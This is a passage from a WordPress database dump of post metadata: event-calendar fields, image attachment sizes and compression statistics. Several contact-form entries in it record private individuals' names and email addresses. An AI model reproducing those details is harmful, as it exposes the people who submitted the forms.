18:30:00'),(131558,263710,'_EventDuration','3600'),(131559,263710,'_EventCurrencySymbol',''),(131560,263710,'_EventCurrencyPosition','prefix'),(131561,263710,'_EventCost',''),(131562,263710,'_EventURL',''),(131563,263710,'_EventTimezone','America/Denver'),(131564,263710,'_EventTimezoneAbbr','MST'),(131567,263710,'_dp_original','263707'),(131566,263710,'_EventVenueID','263708'),(131568,263710,'_edit_lock','1620657324:2'),(131569,263710,'_edit_last','2'),(145091,265364,'original-file','2021/08/elss-boat-1-updraft-pre-smush-original.jpg'),(145092,265364,'smush-complete','1'),(145093,265364,'smush-info','The file was compressed from 23.72 KB to 22.92 KB saving 3.38 percent using WP-Optimize'),(145094,265364,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:24288;s:12:\"smushed-size\";i:23467;s:15:\"savings-percent\";d:3.37999999999999989341858963598497211933135986328125;}'),(168210,267087,'mec_attention_time_start','1662287400'),(145100,265425,'protect_children',''),(145101,265425,'mec_color',''),(145102,265425,'mec_location_id','122'),(145103,265425,'mec_dont_show_map','0'),(145104,265425,'mec_organizer_id','1'),(145105,265425,'mec_start_date','2022-01-06'),(145106,265425,'mec_start_time_hour','8'),(145107,265425,'mec_start_time_minutes','0'),(145108,265425,'mec_start_time_ampm','AM'),(145109,265425,'mec_start_day_seconds','28800'),(145110,265425,'mec_end_date','2022-01-06'),(145111,265425,'mec_end_time_hour','6'),(145112,265425,'mec_end_time_minutes','0'),(145113,265425,'mec_end_time_ampm','PM'),(145114,265425,'mec_end_day_seconds','64800'),(145071,265363,'original-file','2021/08/elss-child-flowers-2-updraft-pre-smush-original.jpg'),(145072,265363,'smush-complete','1'),(146471,265591,'mec_display_cancellation_reason_in_single_page',''),(146470,265591,'mec_cancelled_reason',''),(146469,265591,'mec_moved_online_link',''),(145019,265344,'smush-complete','1'),(145020,265344,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:85189;s:12:\"smushed-size\";i:79524;s:15:\"savings-percent\";d:6.6500000000000003552713678800500929355621337890625;}'),(145018,265344,'smush-info','The file was compressed from 83.19 KB to 77.66 KB saving 6.65 percent using WP-Optimize'),(145017,265344,'original-file','2021/08/ESC-OCT-2021-divine-creativity-10-updraft-pre-smush-original.jpg'),(145016,265347,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:91363;s:12:\"smushed-size\";i:85905;s:15:\"savings-percent\";d:5.96999999999999975131004248396493494510650634765625;}'),(145015,265347,'smush-info','The file was compressed from 89.22 KB to 83.89 KB saving 5.97 percent using WP-Optimize'),(145014,265347,'smush-complete','1'),(145013,265347,'original-file','2021/08/ESC-OCT-2021-divine-creativity-11-updraft-pre-smush-original.jpg'),(145012,265347,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:883;s:6:\"height\";i:595;s:4:\"file\";s:45:\"2021/08/ESC-OCT-2021-divine-creativity-11.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-11-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-11-768x518.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:518;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-11-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-11-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-11-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-11-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145011,265347,'_wp_attached_file','2021/08/ESC-OCT-2021-divine-creativity-11.jpg'),(145010,265344,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:882;s:6:\"height\";i:519;s:4:\"file\";s:45:\"2021/08/ESC-OCT-2021-divine-creativity-10.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-10-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-10-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-10-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-10-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-10-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"ESC-OCT-2021-divine-creativity-10-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145009,265344,'_wp_attached_file','2021/08/ESC-OCT-2021-divine-creativity-10.jpg'),(145008,265336,'_seq_num','9'),(145007,265336,'_form_id','48'),(145006,265336,'_field_448','AlexaReevesMassey@gmail.com'),(145005,265336,'_field_447','Massey'),(145004,265336,'_field_446','Lexi'),(145003,265324,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:59891;s:12:\"smushed-size\";i:55690;s:15:\"savings-percent\";d:7.0099999999999997868371792719699442386627197265625;}'),(145002,265324,'smush-info','The file was compressed from 58.49 KB to 54.38 KB saving 7.01 percent using WP-Optimize'),(145001,265324,'smush-complete','1'),(145000,265324,'original-file','2021/08/ESC-OCT-2021-divine-creativity-9-updraft-pre-smush-original.jpg'),(144999,265324,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:625;s:6:\"height\";i:370;s:4:\"file\";s:44:\"2021/08/ESC-OCT-2021-divine-creativity-9.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-9-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-9-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-9-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-9-300x370.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:370;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-9-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144998,265324,'_wp_attached_file','2021/08/ESC-OCT-2021-divine-creativity-9.jpg'),(144997,265301,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:65846;s:12:\"smushed-size\";i:63139;s:15:\"savings-percent\";d:4.11000000000000031974423109204508364200592041015625;}'),(131919,263792,'_wp_attached_file','2021/02/white-horse-1.jpg'),(131920,263792,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:479;s:6:\"height\";i:269;s:4:\"file\";s:25:\"2021/02/white-horse-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"white-horse-1-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"white-horse-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"white-horse-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(131918,263791,'_edit_last','2'),(131824,263762,'_wp_attached_file','2021/02/barn-mountains-3.jpg'),(131825,263762,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:28:\"2021/02/barn-mountains-3.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"barn-mountains-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"barn-mountains-3-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"barn-mountains-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"barn-mountains-3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:29:\"barn-mountains-3-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"barn-mountains-3-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(131914,263791,'_EventVenueID','262435'),(131916,263791,'_dp_original','263641'),(131917,263791,'_edit_lock','1613582375:2'),(131832,263762,'original-file','2021/02/barn-mountains-3-updraft-pre-smush-original.jpg'),(131833,263762,'smush-complete','1'),(131834,263762,'smush-info','The file was compressed from 680.03 KB to 631.21 KB saving 7.18 percent using WP-Optimize'),(131835,263762,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:696354;s:12:\"smushed-size\";i:646355;s:15:\"savings-percent\";d:7.17999999999999971578290569595992565155029296875;}'),(131837,263772,'_field_133','Herve'),(131838,263772,'_field_134','Wameh '),(131839,263772,'_field_135','hervewameh@gmail.com'),(131840,263772,'_field_137','Become member'),(131841,263772,'_field_138','I want become member'),(131842,263772,'_form_id','13'),(131843,263772,'_seq_num','64'),(131844,33553,'passster_activate_protection',NULL),(131845,33553,'passster_protection_type','password'),(144996,265301,'smush-info','The file was compressed from 64.30 KB to 61.66 KB saving 4.11 percent using WP-Optimize'),(144995,265301,'smush-complete','1'),(144994,265301,'original-file','2021/08/ESC-OCT-2021-divine-creativity-7-updraft-pre-smush-original.jpg'),(144993,265303,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:72917;s:12:\"smushed-size\";i:67722;s:15:\"savings-percent\";d:7.12000000000000010658141036401502788066864013671875;}'),(144992,265303,'smush-info','The file was compressed from 71.21 KB to 66.13 KB saving 7.12 percent using WP-Optimize'),(144991,265303,'smush-complete','1'),(144990,265303,'original-file','2021/08/ESC-OCT-2021-divine-creativity-8-updraft-pre-smush-original.jpg'),(144989,265303,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:725;s:6:\"height\";i:429;s:4:\"file\";s:44:\"2021/08/ESC-OCT-2021-divine-creativity-8.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-8-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-8-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-8-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-8-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-8-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144988,265303,'_wp_attached_file','2021/08/ESC-OCT-2021-divine-creativity-8.jpg'),(144987,265301,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:838;s:6:\"height\";i:471;s:4:\"file\";s:44:\"2021/08/ESC-OCT-2021-divine-creativity-7.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-7-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-7-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-7-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-7-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-7-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-7-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144986,265301,'_wp_attached_file','2021/08/ESC-OCT-2021-divine-creativity-7.jpg'),(144985,265294,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:69734;s:12:\"smushed-size\";i:64994;s:15:\"savings-percent\";d:6.79999999999999982236431605997495353221893310546875;}'),(132064,263805,'protect_children',''),(132065,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132066,263805,'_EventOrigin','events-calendar'),(132067,263805,'protect_children',''),(132068,263805,'protect_children',''),(132069,263805,'protect_children',''),(132070,263805,'protect_children',''),(132071,263805,'protect_children',''),(132072,263805,'protect_children',''),(132073,263805,'protect_children',''),(132074,263805,'protect_children',''),(132075,263805,'protect_children',''),(132076,263805,'protect_children',''),(132077,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132112,263805,'_EventCost',''),(132078,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132111,263805,'_EventCurrencyPosition','prefix'),(132079,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132110,263805,'_EventCurrencySymbol',''),(132113,263805,'_EventURL',''),(132080,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_